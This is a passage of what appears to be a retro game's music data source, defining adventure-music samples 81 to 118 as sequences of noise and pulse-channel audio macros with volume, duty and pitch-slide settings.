AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_WAIT(7) SAMPLE_END .) music_adventure_sample_81: .( AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PLAY_TIMED_FREQ(4,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(1) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(4) SAMPLE_END .) music_adventure_sample_82: .( CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_NOTE_DUT_VOL_USLIDE(20,1,2,13,-10) AUDIO_PULSE_META_NOTE_VOL_DSLIDE(24,1,15,0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(4) SAMPLE_END .) music_adventure_sample_83: .( AUDIO_PULSE_META_NOTE_DUT_VOL(17,1,2,11) SAMPLE_END .) music_adventure_sample_84: .( AUDIO_PULSE_META_NOTE_DUT_VOL_USLIDE(25,1,2,13,-10) AUDIO_PULSE_META_NOTE_VOL_DSLIDE(29,1,15,0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(4) AUDIO_PULSE_META_NOTE_DUT_VOL(17,1,2,11) SAMPLE_END .) music_adventure_sample_85: .( AUDIO_PULSE_META_NOTE_DUT_VOL(17,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_WAIT_DUT_VOL(1,2,11) SAMPLE_END .) music_adventure_sample_86: .( AUDIO_PULSE_META_NOTE_DUT_VOL(15,1,2,11) SAMPLE_END .) music_adventure_sample_87: .( AUDIO_PULSE_META_NOTE_DUT_VOL_USLIDE(27,1,2,13,-10) AUDIO_PULSE_META_NOTE_VOL_DSLIDE(31,1,15,0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(4) AUDIO_PULSE_META_NOTE_DUT_VOL(15,1,2,11) SAMPLE_END .) music_adventure_sample_88: .( AUDIO_PULSE_META_NOTE_DUT_VOL(15,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_WAIT_DUT_VOL(1,2,11) SAMPLE_END .) music_adventure_sample_89: .( AUDIO_PULSE_META_NOTE_DUT_VOL(13,1,2,11) SAMPLE_END .) music_adventure_sample_90: .( AUDIO_PULSE_META_NOTE_DUT_VOL_USLIDE(25,1,2,13,-10) AUDIO_PULSE_META_NOTE_VOL_DSLIDE(29,1,15,0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(4) AUDIO_PULSE_META_NOTE_DUT_VOL(13,1,2,11) SAMPLE_END .) music_adventure_sample_91: .( AUDIO_PULSE_META_NOTE_DUT_VOL(13,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_WAIT_DUT_VOL(1,2,11) SAMPLE_END .) music_adventure_sample_92: .( AUDIO_PULSE_META_NOTE_DUT_VOL(15,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_NOTE_DUT_VOL_USLIDE(23,1,2,13,-10) AUDIO_PULSE_META_NOTE_VOL_DSLIDE(27,1,15,0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(3) AUDIO_PULSE_META_NOTE_VOL_USLIDE(30,1,13,-10) AUDIO_PULSE_META_NOTE_VOL_DSLIDE(34,1,15,0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(3) SAMPLE_END .) music_adventure_sample_93: .( AUDIO_PULSE_META_NOTE_DSLIDE(41,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(40,1,0) PLAY_TIMED_NOTE(0,38) PLAY_TIMED_NOTE(0,36) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(4,44) PLAY_TIMED_NOTE(4,48) PLAY_TIMED_NOTE(4,44) AUDIO_PULSE_META_NOTE_DSLIDE(41,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(40,1,0) PLAY_TIMED_NOTE(0,38) PLAY_TIMED_NOTE(0,36) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(4,44) PLAY_TIMED_NOTE(4,48) PLAY_TIMED_NOTE(4,44) SAMPLE_END .) music_adventure_sample_94: .( SAMPLE_END .) music_adventure_sample_95: .( AUDIO_NOISE_PLAY_TIMED_FREQ(4,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_WAIT(9) AUDIO_NOISE_PLAY_TIMED_FREQ(4,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_WAIT(9) AUDIO_NOISE_PLAY_TIMED_FREQ(4,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PLAY_TIMED_FREQ(4,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PLAY_TIMED_FREQ(4,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) SAMPLE_END .) music_adventure_sample_96: .( AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(10,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(1) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(4) AUDIO_NOISE_PITCH_SLIDE_UP(0) SAMPLE_END .) music_adventure_sample_97: .( AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(10,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(1) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(4) SAMPLE_END .) music_adventure_sample_98: .( AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(1) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(4) AUDIO_NOISE_PLAY_TIMED_FREQ(4,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PLAY_TIMED_FREQ(4,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) SAMPLE_END .) music_adventure_sample_99: .( AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(41,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(36,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(43,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(36,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(44,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(46,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) SAMPLE_END .) music_adventure_sample_100: .( AUDIO_PULSE_META_WAIT_VOL(17,11) AUDIO_PULSE_META_WAIT_USLIDE(8,-3) AUDIO_PULSE_META_NOTE_DSLIDE(48,2,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,0,1) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) SAMPLE_END .) music_adventure_sample_101: .( AUDIO_PULSE_META_WAIT_VOL(22,11) AUDIO_PULSE_META_WAIT_DSLIDE(4,9) AUDIO_PULSE_META_NOTE_DSLIDE(43,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,0,1) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) SAMPLE_END .) music_adventure_sample_102: .( AUDIO_PULSE_META_WAIT_VOL(17,11) AUDIO_PULSE_META_WAIT_USLIDE(8,-7) AUDIO_PULSE_META_NOTE_DSLIDE(51,2,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,0,1) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) SAMPLE_END .) music_adventure_sample_103: .( CHAN_VOLUME_HIGH(3) WAIT(4) SAMPLE_END .) music_adventure_sample_104: .( PLAY_TIMED_NOTE(9,39) PLAY_TIMED_NOTE(9,41) PLAY_TIMED_NOTE(9,39) PLAY_TIMED_NOTE(9,36) PLAY_TIMED_FREQ(333,30) PLAY_TIMED_NOTE(9,36) PLAY_TIMED_NOTE(9,44) PLAY_TIMED_NOTE(9,43) PLAY_TIMED_NOTE(9,41) PLAY_TIMED_NOTE(9,39) SAMPLE_END .) music_adventure_sample_105: .( PLAY_NOTE(1,3,41) SAMPLE_END .) music_adventure_sample_106: .( PLAY_TIMED_FREQ(297,39) SAMPLE_END .) music_adventure_sample_107: .( AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(5,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(1) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_LONG_WAIT(57) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(5,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(1) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_WAIT(6) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(5,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(1) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) SAMPLE_END .) music_adventure_sample_108: .( AUDIO_NOISE_LONG_WAIT(17) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) SAMPLE_END .) music_adventure_sample_109: .( AUDIO_NOISE_WAIT(6) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(5,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(1) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(4) SAMPLE_END .) music_adventure_sample_110: .( AUDIO_PULSE_META_NOTE_DUT_VOL(15,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_WAIT_DUT_VOL(1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(15,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(15,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_WAIT_DUT_VOL(1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_WAIT_DUT_VOL(1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) SAMPLE_END .) music_adventure_sample_111: .( AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(4,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(1) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_LONG_WAIT(47) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) SAMPLE_END .) music_adventure_sample_112: .( AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_PLAY_TIMED_FREQ(4,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_LONG_WAIT(60) SAMPLE_END .) music_adventure_sample_113: .( AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(4,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(1) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_LONG_WAIT(57) AUDIO_NOISE_PITCH_SLIDE_UP(0) SAMPLE_END .) music_adventure_sample_114: .( AUDIO_PULSE_META_NOTE_DUT_VOL(41,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(13,4) AUDIO_PULSE_META_NOTE_DUT_VOL(43,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(13,4) AUDIO_PULSE_META_NOTE_DUT_VOL(44,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_NOTE_DUT_VOL(46,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) CHAN_VOLUME_HIGH(7) HALT(7) LONG_WAIT(12) SAMPLE_END .) music_adventure_sample_115: .( AUDIO_PULSE_META_NOTE_DUT_VOL(48,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(23,4) AUDIO_PULSE_META_NOTE_DUT_VOL(46,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) AUDIO_PULSE_META_NOTE_DUT_VOL(48,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) AUDIO_PULSE_META_NOTE_DUT_VOL(46,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(33,4) SAMPLE_END .) music_adventure_sample_116: .( AUDIO_PULSE_META_NOTE_DUT_VOL(43,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(33,4) AUDIO_PULSE_META_NOTE_DUT_VOL(39,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(23,4) AUDIO_PULSE_META_NOTE_DUT_VOL(36,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) SAMPLE_END .) music_adventure_sample_117: .( AUDIO_PULSE_META_NOTE_DUT_VOL(51,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(22,4) AUDIO_PULSE_META_NOTE_DUT_VOL(53,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(3) AUDIO_PULSE_META_NOTE_DUT_VOL(48,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) AUDIO_PULSE_META_NOTE_DUT_VOL(46,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) AUDIO_PULSE_META_NOTE_DUT_VOL(48,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(13,4) AUDIO_PULSE_META_NOTE_DUT_VOL(46,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) SAMPLE_END .) music_adventure_sample_118: .( 